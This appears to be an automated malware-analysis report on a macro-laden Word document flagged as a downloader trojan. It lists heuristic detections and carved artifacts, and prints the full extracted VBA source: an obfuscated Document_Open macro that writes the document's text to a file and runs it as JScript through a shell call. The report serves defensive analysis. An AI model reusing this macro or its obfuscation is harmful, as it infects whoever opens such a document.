Verdict: MALICIOUS
Risk Score: 210

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer
The sample is a malicious OOXML document containing VBA macros. The macros utilize `CreateObject` and `CallByName` functions, indicative of dynamic execution. The `AutoOpen` macro, combined with `WinHttp` execution, suggests the script is designed to download and execute a second-stage payload. ClamAV detection further confirms its malicious nature as a downloader trojan.
Heuristics (7)

- ClamAV: Doc.Downloader.Trojan-f0f887070fc68787-f0f887070fc68787-9950342-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Trojan-f0f887070fc68787-f0f887070fc68787-9950342-0
- VBA project inside OOXML (medium, OOXML_VBA, 4 related findings): Document contains a VBA project — VBA macros present
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script:
  `Debug.Print (CallByName(CreateObject(Dalore & "." & Messerrt), Dalore & Vopaso, VbMethod, Dazaxok & Dalore, "W" & Beca & " /" & Basoli & Beca & " " & Chr((69 - 1) / 2) & Terix & Chr((60 + 8) / 2), "", "", 0))`
- CallByName call (high, OLE_VBA_CALLBYNAME). Matched line in script:
  `Debug.Print (CallByName(CreateObject(Dalore & "." & Messerrt), Dalore & Vopaso, VbMethod, Dazaxok & Dalore, "W" & Beca & " /" & Basoli & Beca & " " & Chr((69 - 1) / 2) & Terix & Chr((60 + 8) / 2), "", "", 0))`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Document_Open macro (low, OLE_VBA_DOCOPEN). Matched line in script:
  `Private Sub Document_Open()`
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Each of the following URLs was found in document text (OOXML body / shared strings):
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2646 bytes | ed7c553573d9813f9018d0326b6ed4c83dc6164cc994f0c4874412597205ebfe |
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 53248 bytes | f22cc5402b22b07574486e5b9cdcaefd9836503848eead7c43620485d9e80423 |

Preview of macros.bas (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private oncetime As Boolean
Private Boris As String
Private Terix As String
Private Messerrt As String
Private Dalore As String
Public Beca As String
Public Dazaxok As String
Public Basoli As String
Public Vopaso As String
Sub AddTextAtStartOfTask()
'This macro adds text you enter at the start of the name of all selected tasks
'It is useful if you want to identify certain tasks as being part of a group for example "sprint 2".
'Based on AddMyText by Jack Dahlgren, Feb 2002
'Copyright T Morphy July 2014
Dim addtext As String
Dim UpdateTask As Task
If ActiveSelection = 0 Then
MsgBox "Select the tasks that you want to add text to"
Exit Sub
End If
addtext = "Enter text to add to the start of the task name - no leading space needed, leave blank to quit"
If addtext = "" Then Exit Sub
For Each UpdateTask In ActiveSelection.Tasks
UpdateTask.Name = addtext & " " & UpdateTask.Name
Next UpdateTask
End Sub
Private Sub ReCallMe()
Debug.Print (CallByName(CreateObject(Dalore & "." & Messerrt), Dalore & Vopaso, VbMethod, Dazaxok & Dalore, "W" & Beca & " /" & Basoli & Beca & " " & Chr((69 - 1) / 2) & Terix & Chr((60 + 8) / 2), "", "", 0))
End Sub
Private Sub InGoPo(data As Variant)
Dim SeemsGood As String, Dupolas As Integer
Messerrt = Mid("Really coapplication", 10, 11)
Dalore = Mid("Sheller in hole!", 1, 5)
Beca = Mid("Delete a tyscript", 12, 6)
SeemsGood = ActiveDocument.AttachedTemplate.Path & "\pp:br"
Terix = SeemsGood
Dupolas = FreeFile
Open SeemsGood For Binary Lock Read Write As #Dupolas
Put #Dupolas, , ActiveDocument.Content.Text
Close #Dupolas
Dazaxok = Mid("AC\DC power too", 7, 4 + 1)
Basoli = Mid("ARE you Ae:j----", 10, 3)
Vopaso = Mid("Huge big Teexecute them", 12, 7)
End Sub
Private Sub Document_Open()
If oncetime = False Then
oncetime = True
InGoPo 1
ReCallMe
End If
End Sub
Private Function Moose()
Desazom (Empty)
End Function
Attribute VB_Name = "NewMacros"
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C41FD55C-D225-461C-9DB7-DCFCE0949EA2}{BD0F1918-DA46-4F3E-BDEA-DBBFD07CDA31}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
```